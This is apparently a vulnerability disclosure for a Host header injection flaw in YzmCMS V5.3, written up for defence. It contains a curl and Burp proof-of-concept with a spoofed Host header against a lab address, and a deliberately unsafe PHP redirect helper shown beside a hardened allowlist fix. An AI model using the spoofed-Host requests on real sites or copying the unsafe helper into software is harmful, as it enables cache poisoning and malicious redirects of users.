Open
Description
Host header injection vulnerability found on YzmCMS V5.3. Using this attack, a malicious user can poison the web cache or perform arbitrary user redirection.
PoC:
Test Environment: Windows 7 SP1(64bit)
XAMPP: 7.3.9
YzmCMS V5.3 Access Path: 192.168.30.169/yzmcms/
root@kali:~# curl http://192.168.30.169/yzmcms/member/ -H "Host: www.google.com"
<title>YzmCMS提示信息</title> <style type="text/css"> *{padding:0;margin:0;} body{background:#fff;color:#000;font-family:"Microsoft Yahei","Hiragino Sans GB","Helvetica Neue",Helvetica,tahoma,arial,"WenQuanYi Micro Hei",Verdana,sans-serif;} #msg{border:1px solid #5eb95e;width:500px;position:absolute;top:44%;left:50%;margin:-87px 0 0 -250px;padding:1px;line-height:30px;text-align:center;font-size:16px;background:#fff;} #msgtit{height:35px;line-height:35px;color:#fff;background:#5eb95e;} #msgbody{margin:20px 0;text-align:center} #info{margin-bottom:10px;} #msgbody p{font-size:14px;} #msgbody p a{font-size:14px;color:#333;text-decoration:none;} #msgbody p a:hover{color:#5a98de;} </style>提示信息
请先登录!
本页面将在1秒后跳转...
Or if we capture this in Burp:
GET /yzmcms/member/ HTTP/1.1
Host: 192.168.30.169

Next, change the "Host" to www.google.com and click "Go" to send the web request:

This will be redirected to www.google.com with a 404 response.
Capturing the response and opening it in the browser will show the following:

This was detected and emailed to you on 18-Sep-2019, but there was no response, so I am providing the information here. Thank you.
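The redirect behaviour reported above, as an added example in PHP that is not YzmCMS's own code: a hypothetical redirect helper that copies the client's Host header straight into an absolute URL (the pattern the curl and Burp tests above exercise) next to a hardened version that only accepts hostnames from a configured allowlist and otherwise falls back to the site's canonical host. ALLOWED_HOSTS, CANONICAL_HOST and the function names are assumptions, not YzmCMS identifiers, and the request arrays at the bottom are constructed to mirror the report's spoofed and legitimate requests.

```php
<?php
// Added example, not YzmCMS code. Shows why a redirect built from HTTP_HOST
// can be steered to an attacker-chosen domain, and one way to harden it.

// Constructed configuration (assumption): the hosts this deployment answers for.
const ALLOWED_HOSTS  = ['192.168.30.169', 'cms.example.test'];
const CANONICAL_HOST = '192.168.30.169';

function request_scheme(array $server): string
{
    return (!empty($server['HTTPS']) && $server['HTTPS'] !== 'off') ? 'https' : 'http';
}

// Vulnerable pattern: the redirect target inherits whatever Host the client sent,
// so "Host: www.google.com" yields a Location pointing at www.google.com.
function redirect_url_unsafe(array $server, string $path): string
{
    return request_scheme($server) . '://' . $server['HTTP_HOST'] . $path;
}

// Hardened pattern: normalise the Host value (case, whitespace, optional port),
// accept it only if it is on the allowlist, otherwise use the canonical host.
function resolve_trusted_host(?string $hostHeader): string
{
    if ($hostHeader === null) {
        return CANONICAL_HOST;
    }
    $host = strtolower(trim($hostHeader));

    if ($host !== '' && $host[0] === '[') {
        // Bracketed IPv6 literal: keep "[...]", drop any ":port" after it.
        $end  = strpos($host, ']');
        $host = ($end === false) ? '' : substr($host, 0, $end + 1);
    } else {
        // Plain hostname or IPv4: drop an optional ":port" suffix.
        $host = explode(':', $host, 2)[0];
    }

    return in_array($host, ALLOWED_HOSTS, true) ? $host : CANONICAL_HOST;
}

function redirect_url_safe(array $server, string $path): string
{
    $host = resolve_trusted_host($server['HTTP_HOST'] ?? null);
    return request_scheme($server) . '://' . $host . $path;
}

// Constructed requests: the spoofed Host from the report and a legitimate one.
$spoofed = ['HTTP_HOST' => 'www.google.com'];
$legit   = ['HTTP_HOST' => '192.168.30.169:80'];

echo 'unsafe, spoofed : ', redirect_url_unsafe($spoofed, '/yzmcms/member/'), PHP_EOL;
echo 'safe,   spoofed : ', redirect_url_safe($spoofed, '/yzmcms/member/'), PHP_EOL;
echo 'safe,   legit   : ', redirect_url_safe($legit, '/yzmcms/member/'), PHP_EOL;
```

The allowlist check is deliberately exact-match after normalisation rather than a substring or regex test, since a loose match is what lets a look-alike host through. The same fix belongs at the web-server layer too: a default virtual host that does not serve the application, or a reverse proxy that overwrites Host with the configured value, stops unknown Host values from ever reaching PHP, and any cache in front of the site should key on the canonical host so a poisoned response cannot be stored for other users.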